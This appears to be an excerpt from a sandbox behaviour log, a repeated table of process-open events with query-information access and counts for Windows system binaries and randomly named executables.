| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
6 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
